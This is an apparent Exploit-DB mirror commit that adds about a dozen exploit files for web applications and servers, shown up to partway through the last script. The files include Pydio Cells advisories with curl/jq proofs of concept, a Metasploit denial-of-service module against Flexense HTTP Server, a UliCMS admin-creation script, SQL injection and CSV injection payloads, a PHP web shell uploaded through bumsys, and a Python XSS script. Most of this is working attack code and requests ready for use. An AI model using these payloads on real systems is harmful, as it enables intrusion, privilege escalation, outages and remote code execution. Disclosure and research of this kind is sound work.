bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2023-06-01

Browse source 
13 changes to exploits/shellcodes/ghdb

Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download
Pydio Cells 4.1.2 - Server-Side Request Forgery
Pydio Cells 4.1.2 - Unauthorised Role Assignments

Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit)

MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI)

Faculty Evaluation System 1.0 - Unauthenticated File Upload

Online Security Guards Hiring System 1.0 - Reflected XSS

Online shopping system advanced 1.0 - Multiple Vulnerabilities

Rukovoditel 3.3.1 - CSV injection

SCRMS 2023-05-27 1.0 - Multiple SQL Injection

Service Provider Management System v1.0 - SQL Injection

Ulicms-2023.1-sniffing-vicuna - Privilege escalation

unilogies/bumsys v1.0.3 beta - Unrestricted File Upload
This commit is contained in:
Exploit-DB 2023-06-01 00:16:25 +00:00
parent 9e36596021
commit cb5c64da21
13 changed files with 1247 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

217
exploits/go/webapps/51496.txt Normal file
View file

@ -0,0 +1,217 @@
Exploit Title: Pydio Cells 4.1.2 - Unauthorised Role Assignments
Affected Versions: 4.1.2 and earlier versions
Fixed Versions: 4.2.0, 4.1.3, 3.0.12
Vulnerability Type: Privilege Escalation
Security Risk: high
Vendor URL: https://pydio.com/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-003
Advisory Status: published
CVE: CVE-2023-32749
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32749
Introduction
============
"Pydio Cells is an open-core, self-hosted Document Sharing and
Collaboration platform (DSC) specifically designed for organizations
that need advanced document sharing and collaboration without security
trade-offs or compliance issues."
(from the vendor's homepage)
More Details
============
Users can share cells or folders with other users on the same Pydio
instance. The web application allows to either select an already
existing user from a list or to create a new user by entering a new
username and password, if this functionality is enabled. When creating a
new user in this way, a HTTP PUT request like the following is sent:
------------------------------------------------------------------------
PUT /a/user/newuser HTTP/2
Host: example.com
User-Agent: agent
Authorization: Bearer O48gvjD[...]
Content-Type: application/json
Content-Length: 628
Cookie: token=AO[...]
{
"Attributes": {
"profile": "shared",
"parameter:core.conf:lang": "\"en-us\"",
"send_email": "false"
},
"Roles": [],
"Login": "newuser",
"Password": "secret!",
"GroupPath": "/",
"Policies": [...]
}
------------------------------------------------------------------------
The JSON object sent in the body contains the username and password
for the user to be created and an empty list for the key "Roles". The
response contains a JSON object similar to the following:
------------------------------------------------------------------------
{
"Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce",
"GroupPath": "/",
"Attributes": {
"parameter:core.conf:lang": "\"en-us\"",
"profile": "shared"
},
"Roles": [
{
"Uuid": "EXTERNAL_USERS",
"Label": "External Users",
"Policies": [...]
},
{
"Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce",
"Label": "User newuser",
"UserRole": true,
"Policies": [...]
}
],
"Login": "newuser",
"Policies": [....],
"PoliciesContextEditable": true
}
------------------------------------------------------------------------
The key "Roles" now contains a list with two objects, which seem to be
applied by default. The roles list in the HTTP request can be
modified to contain a list of all available UUIDs for roles, which can
be obtained by using the user search functionality. This results in a
new user account with all roles applied. By performing a login as the
newly created user, access to all cells and non-personal workspaces of
the whole Pydio instance is granted.
Proof of Concept
================
Login to the Pydio Cells web interface with a regular user and retrieve
the JWT from the HTTP requests. This can either be done using an HTTP
attack proxy or using the browser's developer tools. Subsequently, curl [1]
can be used as follows to retrieve a list of all users and their roles:
------------------------------------------------------------------------
$ export JWT="<insert JWT here>"
$ curl --silent \
--header "Authorization: Bearer $TOKEN" \
--header 'Content-Type: application/json' \
--data '{}' \
https://example.com/a/user | tee all_users.json
{"Users":[...]}
------------------------------------------------------------------------
Afterwards, jq [2] can be used to create a JSON document which can be
sent to the Pydio REST-API in order to create the external user "foobar"
with the password "hunter2" and all roles assigned:
------------------------------------------------------------------------
$ jq '.Users[].Roles' all_users.json \
| jq -s 'flatten | .[].Uuid | {Uuid: .}' \
| jq -s 'unique' \
| jq '{"Login": "foobar", "Password": "hunter2", "Attributes":
{"profile": "shared"}, "Roles": .}' \
| tee create_user.json
{
"Login": "foobar",
"Password": "hunter2",
"Attributes": {
"profile": "shared"
},
"Roles": [...]
}
------------------------------------------------------------------------
Finally, the following curl command can be issued to create the new external
user:
------------------------------------------------------------------------
$ curl --request PUT \
--silent \
--header "Authorization: Bearer $JWT" \
--header 'Content-Type: application/json' \
--data @create_user.json \
https://example.com/a/user/foobar
------------------------------------------------------------------------
Now, login with the newly created user to access all cells and
non-personal workspaces.
Workaround
==========
Disallow the creation of external users in the authentication settings.
Fix
===
Upgrade Pydio Cells to a version without the vulnerability.
Security Risk
=============
Attackers with access to any regular user account for a Pydio Cells instance can
extend their privileges by creating a new external user with all roles
assigned. Subsequently, they can access all folders and files in any
cell and workspace, except for personal workspaces. The creation of
external users is activated by default. Therefore, the vulnerability is
estimated to pose a high risk.
Timeline
========
2023-03-23 Vulnerability identified
2023-05-02 Customer approved disclosure to vendor
2023-05-02 Vendor notified
2023-05-03 CVE ID requested
2023-05-08 Vendor released fixed version
2023-05-14 CVE ID assigned
2023-05-16 Vendor asks for a few more days before the advisory is released
2023-05-30 Advisory released
References
==========
[1] https://curl.se/
[2] https://stedolan.github.io/jq/
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/

195
exploits/go/webapps/51497.txt Normal file
View file

@ -0,0 +1,195 @@
Exploit Title: Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download
Affected Versions: 4.1.2 and earlier versions
Fixed Versions: 4.2.0, 4.1.3, 3.0.12
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: https://pydio.com/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-004
Advisory Status: published
CVE: CVE-2023-32751
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32751
Introduction
============
"Pydio Cells is an open-core, self-hosted Document Sharing and
Collaboration platform (DSC) specifically designed for organizations
that need advanced document sharing and collaboration without security
trade-offs or compliance issues."
(from the vendor's homepage)
More Details
============
When a file named "xss.html" is downloaded in the Pydio Cells web application, a
download URL similar to the following is generated:
https://example.com/io/xss/xss.html
?AWSAccessKeyId=gateway
&Expires=1682495748
&Signature=920JV0Zy%2BrNYXjak7xksAxRpRp8%3D
&response-content-disposition=attachment%3B%20filename%3Dxss.html
&pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...]
The URL is akin to a presigned URL as used by the Amazon S3 service. It
contains the URL parameter "response-content-disposition" which is set
to "attachment" causing the response to contain a "Content-Disposition"
header with that value. Therefore, the browser downloads the file
instead of interpreting it. The URL also contains a signature and expiry
timestamp, which are checked by the backend. Unlike a presigned URL as used
by S3, the URL also contains the parameter "pydio_jwt" with the JWT of
the user for authentication. Furthermore, the access key with the ID
"gateway" is referenced, which can be found in the JavaScript sources of
Pydio Cells together with the secret:
------------------------------------------------------------------------
_awsSdk.default.config.update({
accessKeyId: 'gateway',
secretAccessKey: 'gatewaysecret',
s3ForcePathStyle: !0,
httpOptions: {
timeout: PydioApi.getMultipartUploadTimeout()
}
});
------------------------------------------------------------------------
With this information it is possible to change the URL parameter
"response-content-disposition" to the value "inline" and then calculate
a valid signature for the resulting URL. Furthermore, the content type of
the response can be changed to "text/html" by also adding the URL
parameter "response-content-type" with that value. This would result in
a URL like the following for the previously shown example URL:
https://example.com/io/xss/xss.html?
AWSAccessKeyId=gateway
&Expires=1682495668
&Signature=HpKue0YQZrnp%2B665Jf1t7ONgfRg%3D
&response-content-disposition=inline
&response-content-type=text%2Fhtml
&pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...]
Upon opening the URL in a browser, the HTML included in the file is
interpreted and any JavaScript code is run.
Proof of Concept
================
Upload a HTML file into an arbitrary location of a Pydio Cells instance.
For example with the following contents:
------------------------------------------------------------------------
<html>
<body>
<h1>Cross-Site Scriping</h1>
<script>
let token = JSON.parse(localStorage.token4).AccessToken;
alert(token);
</script>
</body>
</html>
------------------------------------------------------------------------
The contained JavaScript code reads the JWT access token for Pydio Cells
from the browser's local storage object and opens a message box. Instead
of just displaying the JWT, it could also be sent to an attacker. The
following JavaScript function can then be run within the browser's
developer console to generate a presigned URL for the HTML file:
------------------------------------------------------------------------
async function getPresignedURL(path) {
let client = PydioApi.getClient();
let node = new AjxpNode(path);
let metadata = {Bucket: "io", ResponseContentDisposition: "inline", Key: path, ResponseContentType: "text/html"};
let url = await client.buildPresignedGetUrl(node, null, "text/html", metadata);
return url;
}
await getPresignedURL("xss/xss.html");
------------------------------------------------------------------------
The code has to be run in context of Pydio Cells while being logged in.
If the resulting URL is opened in a browser, the JavaScript code
contained in the HTML file is run. If the attack is conducted in the
described way, the JWT of the attacker is exposed through the URL.
However, this can be circumvented by first generating a public URL
for the file and then constructing the presigned URL based on the
resulting download URL.
Workaround
==========
No workaround known.
Fix
===
Upgrade Pydio Cells to a version without the vulnerability.
Security Risk
=============
Attackers that can upload files to a Pydio Cells instance can construct
URLs that execute arbitrary JavaScript code in context of Pydio Cells
upon opening. This could for example be used to steal the authentication
tokens of users opening the URL. It is likely that such an attack
succeeds, since sharing URLs to files hosted using Pydio Cells is a
common use case of the application. Therefore, the vulnerability is
estimated to pose a high risk.
Timeline
========
2023-03-23 Vulnerability identified
2023-05-02 Customer approved disclosure to vendor
2023-05-02 Vendor notified
2023-05-03 CVE ID requested
2023-05-08 Vendor released fixed version
2023-05-14 CVE ID assigned
2023-05-16 Vendor asks for a few more days before the advisory is released
2023-05-30 Advisory released
References
==========
[1] https://aws.amazon.com/sdk-for-javascript/
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Alter Posthof 1 Fax : +49 241 510081-99
52062 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen

148
exploits/go/webapps/51498.txt Normal file
View file

@ -0,0 +1,148 @@
Exploit Title: Pydio Cells 4.1.2 - Server-Side Request Forgery
Affected Versions: 4.1.2 and earlier versions
Fixed Versions: 4.2.0, 4.1.3, 3.0.12
Vulnerability Type: Server-Side Request Forgery
Security Risk: medium
Vendor URL: https://pydio.com/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-005
Advisory Status: published
CVE: CVE-2023-32750
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32750
Introduction
============
"Pydio Cells is an open-core, self-hosted Document Sharing and
Collaboration platform (DSC) specifically designed for organizations
that need advanced document sharing and collaboration without security
trade-offs or compliance issues."
(from the vendor's homepage)
More Details
============
Using the REST-API of Pydio Cells it is possible to start jobs. For
example, when renaming a file or folder an HTTP request similar to the
following is sent:
------------------------------------------------------------------------
PUT /a/jobs/user/move HTTP/2
Host: example.com
User-Agent: agent
Accept: application/json
Authorization: Bearer G4ZRN[...]
Content-Type: application/json
Content-Length: 140
{
"JobName": "move",
"JsonParameters": "{\"nodes\":[\"cell/file.txt\"],\"target\":\"cell/renamed.txt\",\"targetParent\":false}"
}
------------------------------------------------------------------------
The body contains a JSON object with a job name and additional
parameters for the job. Besides the "move" job, also a job with the name
"remote-download" exists. It takes two additional parameters: "urls" and
"target". In the "urls" parameter, a list of URLs can be specified and in
the parameter "target" a path can be specified in which to save the
response. When the job is started, HTTP GET requests are sent from the
Pydio Cells server to the specified URLs. The responses are saved into a
file, which are uploaded to the specified folder within Pydio Cells.
Potential errors are transmitted in a WebSocket channel, which can be
opened through the "/ws/event" endpoint.
Proof of Concept
================
Log into Pydio Cells and retrieve the JWT from the HTTP requests. Then,
run the following commands to start a "remote-download" job to trigger
an HTTP request:
------------------------------------------------------------------------
$ export JWT="<insert JWT here>"
$ echo '{"urls": ["http://localhost:8000/internal.html"], "target": "personal-files"}' \
| jq '{"JobName": "remote-download", "JsonParameters": (. | tostring)}' \
| tee remote-download.json
$ curl --header "Authorization: Bearer $JWT" \
--header 'Content-Type: application/json' \
--request PUT \
--data @remote-download.json 'https://example.com/a/jobs/user/remote-download'
------------------------------------------------------------------------
The URL in the JSON document specifies which URL to request. The "target"
field in the same document specifies into which folder the response is saved.
Afterwards, the response is contained in a file in the specified folder.
Potential errors are communicated through the WebSocket channel.
Workaround
==========
Limit the services which can be reached by the Pydio Cells server, for
example using an outbound firewall.
Fix
===
Upgrade Pydio Cells to a version without the vulnerability.
Security Risk
=============
The risk is highly dependent on the environment in which the attacked
Pydio Cells instance runs. If there are any internal HTTP services which
expose sensitive data on the same machine or within the same network,
the server-side request forgery vulnerability could pose a significant
risk. In other circumstances, the risk could be negligible. Therefore,
overall the vulnerability is rated as a medium risk.
Timeline
========
2023-03-23 Vulnerability identified
2023-05-02 Customer approved disclosure to vendor
2023-05-02 Vendor notified
2023-05-03 CVE ID requested
2023-05-08 Vendor released fixed version
2023-05-14 CVE ID assigned
2023-05-16 Vendor asks for a few more days before the advisory is released
2023-05-30 Advisory released
References
==========
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/

98
exploits/multiple/remote/51493.rb Executable file
View file

@ -0,0 +1,98 @@
##
# Exploit Title: Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit)
# Date: 2018-03-09
# Exploit Author: Ege Balci
# Vendor Homepage: https://www.flexense.com/downloads.html
# Version: <= 10.6.24
# CVE : CVE-2018-8065
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Dos
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Flexense HTTP Server Denial Of Service',
'Description' => %q{
This module triggers a Denial of Service vulnerability in the Flexense HTTP server.
Vulnerability caused by a user mode write access memory violation and can be triggered with
rapidly sending variety of HTTP requests with long HTTP header values.
Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below vesions reportedly vulnerable.
},
'Author' => [ 'Ege Balci <ege.balci@invictuseurope.com>' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2018-8065'],
[ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ],
],
'DisclosureDate' => '2018-03-09'))
register_options(
[
Opt::RPORT(80),
OptString.new('PacketCount', [ true, "The number of packets to be sent (Recommended: Above 1725)" , 1725 ]),
OptString.new('PacketSize', [ true, "The number of bytes in the Accept header (Recommended: 4088-5090" , rand(4088..5090) ])
])
end
def check
begin
connect
sock.put("GET / HTTP/1.0\r\n\r\n")
res = sock.get
if res and res.include? 'Flexense HTTP Server v10.6.24'
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
rescue Rex::ConnectionRefused
print_error("Target refused the connection")
Exploit::CheckCode::Unknown
rescue
print_error("Target did not respond to HTTP request")
Exploit::CheckCode::Unknown
end
end
def run
unless check == Exploit::CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
size = datastore['PacketSize'].to_i
print_status("Starting with packets of #{size}-byte strings")
count = 0
loop do
payload = ""
payload << "GET /" + Rex::Text.rand_text_alpha(rand(30)) + " HTTP/1.1\r\n"
payload << "Host: 127.0.0.1\r\n"
payload << "Accept: "+('A' * size)+"\r\n"
payload << "\r\n\r\n"
begin
connect
sock.put(payload)
disconnect
count += 1
break if count==datastore['PacketCount']
rescue ::Rex::InvalidDestination
print_error('Invalid destination! Continuing...')
rescue ::Rex::ConnectionTimeout
print_error('Connection timeout! Continuing...')
rescue ::Errno::ECONNRESET
print_error('Connection reset! Continuing...')
rescue ::Rex::ConnectionRefused
print_good("DoS successful after #{count} packets with #{size}-byte headers")
return true
end
end
print_error("DoS failed after #{count} packets of #{size}-byte strings")
end
end

38
exploits/multiple/webapps/51499.txt Normal file
View file

@ -0,0 +1,38 @@
# Title: MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI)
# Author: tmrswrr
# Date: 31/05/2023
# Vendor: https://www.motocms.com
# Link: https://www.motocms.com/website-templates/demo/189526.html
# Vulnerable Version(s): MotoCMS 3.0.27
## Description
MotoCMS Version 3.4.3 Store Category Template was discovered to contain a Server-Side Template
Injection (SSTI) vulnerability via the keyword parameter.
## Steps to Reproduce
1. Open the target URL: https://template189526.motopreview.com/
2. Write payload here : https://template189526.motopreview.com/store/category/search/?page=1&limit=36&keyword={{7*7}}
3. You will be see result is 49
Vuln Url : https://template189526.motopreview.com/store/category/search/?page=1&limit=36&keyword={{7*7}}
GET /store/category/search/?page=&limit=&keyword={{7*7}} HTTP/1.1
Host: template189526.motopreview.com
Cookie: PHPSESSID=7c0qgdvsehaf1a2do6s0bcl4p0; 9b7029e0bd3be0d41ebefd47d9f5ae46_session-started=1685536759239
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Referer: https://template189526.motopreview.com/store/category/search/?keyword=%7B%7B3*3%7D%7D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

32
exploits/php/webapps/51433.py Executable file
View file

@ -0,0 +1,32 @@
#Exploit Title: Ulicms 2023.1 sniffing-vicuna - Privilege escalation
#Application: Ulicms
#Version: 2023.1-sniffing-vicuna
#Bugs: Privilege escalation
#Technology: PHP
#Vendor URL: https://en.ulicms.de/
#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip
#Date of found: 04-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicuna
import requests
new_name=input("name: ")
new_email=input("email: ")
new_pass=input("password: ")
url = "http://localhost/dist/admin/index.php"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language="
response = requests.post(url, headers=headers, data=data)
if response.status_code == 200:
print("Request is success and created new admin account")
else:
print("Request is failure.!!")

19
exploits/php/webapps/51490.txt Normal file
View file

@ -0,0 +1,19 @@
Exploit Title: Rukovoditel 3.3.1 - CSV injection
Version: 3.3.1
Bugs: CSV Injection
Technology: PHP
Vendor URL: https://www.rukovoditel.net/
Software Link: https://www.rukovoditel.net/download.php
Date of found: 27-05-2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
Step 1. login as user
step 2. Go to My Account ( http://127.0.0.1/index.php?module=users/account )
step 3. Set Firstname as =calc|a!z|
step 3. If admin Export costumers as CSV file ,in The computer of admin occurs csv injection and will open calculator (http://localhost/index.php?module=items/items&path=1)
payload: =calc|a!z|

50
exploits/php/webapps/51491.txt Normal file
View file

@ -0,0 +1,50 @@
## Exploit Title: SCRMS 2023-05-27 1.0 - Multiple SQLi
## Author: nu11secur1ty
## Date: 05.27.2023
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/15895/simple-customer-relationship-management-crm-system-using-php-free-source-coude.html
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The `email` parameter appears to be vulnerable to SQL injection
attacks. The test payloads 45141002' or 6429=6429-- and 37491017' or
5206=5213-- were each submitted in the email parameter. These two
requests resulted in different responses, indicating that the input is
being incorporated into a SQL query in an unsafe way. The attacker can
easily steal all users and their passwords for access to the system.
Even if they are strongly encrypted this will get some time, but this
is not a problem for an attacker to decrypt if, if they are not enough
strongly encrypted.
STATUS: HIGH Vulnerability
[+]Payload:
```mysql
---
Parameter: email (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: email=-1544' OR 2326=2326-- eglC&password=c5K!k0k!T7&login=
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/SCRMS-2023-05-27-1.0)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/05/scrms-2023-05-27-10-multiple-sqli.html)
## Time spend:
01:00:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

106
exploits/php/webapps/51492.txt Normal file
View file

@ -0,0 +1,106 @@
Exploit Title: - unilogies/bumsys v1.0.3-beta - Unrestricted File Upload
Google Dork : NA
Date: 19-01-2023
Exploit Author: AFFAN AHMED
Vendor Homepage: https://github.com/unilogies/bumsys
Software Link: https://github.com/unilogies/bumsys/archive/refs/tags/v1.0.3-beta.zip
Version: 1.0.3-beta
Tested on: Windows 11, XAMPP-8.2.0
CVE : CVE-2023-0455
================================
Steps_TO_Reproduce
================================
- Navigate to this URL:[https://demo.bumsys.org/settings/shop-list/](https://demo.bumsys.org/settings/shop-list/)
- Click on action button to edit the Profile
- Click on select logo button to upload the image
- Intercept the POST Request and do the below changes .
================================================================
Burpsuite-Request
================================================================
POST /xhr/?module=settings&page=updateShop HTTP/1.1
Host: demo.bumsys.org
Cookie: eid=1; currencySymbol=%EF%B7%BC; keepAlive=1; __0bb0b4aaf0f729565dbdb80308adac3386976ad3=9lqop41ssg3i9trh73enqbi0i7
Content-Length: 1280
Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99"
X-Csrf-Token: 78abb0cc27ab54e87f66e8160dab3ab48261a8b4
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynO0QAD84ekUMuGaA
Accept: */*
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.bumsys.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.bumsys.org/settings/shop-list/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopName"
TEST
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopAddress"
test
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopCity"
testcity
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopState"
teststate
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopPostalCode"
700056
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopCountry"
testIND
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopPhone"
895623122
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopEmail"
test@gmail.com
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopInvoiceFooter"
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopLogo"; filename="profile picture.php"
Content-Type: image/png
<?php echo system($_REQUEST['dx']); ?>
====================================================================================
Burpsuite-Response
====================================================================================
HTTP/1.1 200 OK
Date: Thu, 19 Jan 2023 07:14:26 GMT
Server: Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips
X-Powered-By: PHP/7.0.33
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 65
<div class='alert alert-success'>Shop successfully updated.</div>
====================================================================================
VIDEO-POC : https://youtu.be/nwxIoSlyllQ

94
exploits/php/webapps/51494.py Executable file
View file

@ -0,0 +1,94 @@
#Exploit Title: Online Security Guards Hiring System 1.0 REFLECTED XSS
#Google Dork : NA
#Date: 23-01-2023
#Exploit Author : AFFAN AHMED
#Vendor Homepage: https://phpgurukul.com
#Software Link: https://phpgurukul.com/projects/Online-Security-Guard-Hiring-System_PHP.zip
#Version: 1.0
#Tested on: Windows 11 + XAMPP + PYTHON-3.X
#CVE : CVE-2023-0527
#NOTE: TO RUN THE PROGRAM FIRST SETUP THE CODE WITH XAMPP AND THEN RUN THE BELOW PYTHON CODE TO EXPLOIT IT
# Below code check for both the parameter /admin-profile.php and in /search.php
#POC-LINK: https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.md
import requests
import re
from colorama import Fore
print(Fore.YELLOW + "######################################################################" + Fore.RESET)
print(Fore.RED + "# TITLE: Online Security Guards Hiring System v1.0" + Fore.RESET)
print(Fore.RED + "# VULNERABILITY-TYPE : CROSS-SITE SCRIPTING (XSS)" + Fore.RESET)
print(Fore.RED + "# VENDOR OF THE PRODUCT : PHPGURUKUL" + Fore.RESET)
print(Fore.RED + "# AUTHOR : AFFAN AHMED" + Fore.RESET)
print(Fore.YELLOW +"######################################################################" + Fore.RESET)
print()
print(Fore.RED+"NOTE: To RUN THE CODE JUST TYPE : python3 exploit.py"+ Fore.RESET)
print()
# NAVIGATING TO ADMIN LOGIN PAGE
Website_url = "http://localhost/osghs/admin/login.php" # CHANGE THE URL ACCORDING TO YOUR SETUP
print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)
print(Fore.CYAN + "[**] Inserting the Username and Password in the Admin Login Form [**]" + Fore.RESET)
print(Fore.RED+"----------------------------------------------------------------------"+Fore.RESET)
Admin_login_credentials = {'username': 'admin', 'password': 'Test@123', 'login': ''}
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Referer': 'http://localhost/osghs/admin/login.php',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9',
'Connection': 'close',
'Cookie': 'PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-User': '?1',
'Sec-Fetch-Dest': 'document'
}
response = requests.request("POST", Website_url, headers=headers, data = Admin_login_credentials)
if response.status_code == 200:
location = re.findall(r'document.location =\'(.*?)\'',response.text)
if location:
print(Fore.GREEN + "> Login Successful into Admin Account"+Fore.RESET)
print(Fore.GREEN + "> Popup:"+ Fore.RESET,location )
else:
print(Fore.GREEN + "> document.location not found"+ Fore.RESET)
else:
print(Fore.GREEN + "> Error:", response.status_code + Fore.RESET)
print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)
print(Fore.CYAN + " [**] Trying XSS-PAYLOAD in Admin-Name Parameter [**]" + Fore.RESET)
# NAVIGATING TO ADMIN PROFILE SECTION TO UPDATE ADMIN PROFILE
# INSTEAD OF /ADMIN-PROFILE.PHP REPLACE WITH /search.php TO FIND XSS IN SEARCH PARAMETER
Website_url= "http://localhost/osghs/admin/admin-profile.php" # CHANGE THIS URL ACCORDING TO YOUR PREFERENCE
# FOR CHECKING XSS IN ADMIN-PROFILE USE THE BELOW PAYLOAD
# FOR CHECKING XSS IN SEARCH.PHP SECTION REPLACE EVERYTHING AND PUT searchdata=<your-xss-payload>&search=""
payload = {
"adminname": "TESTAdmin<script>alert(\"From-Admin-Name\")</script>", # XSS-Payload , CHANGE THIS ACCORDING TO YOUR PREFERENCE
"username": "admin", # THESE DETAILS ARE RANDOM , CHANGE IT TO YOUR PREFERENCE
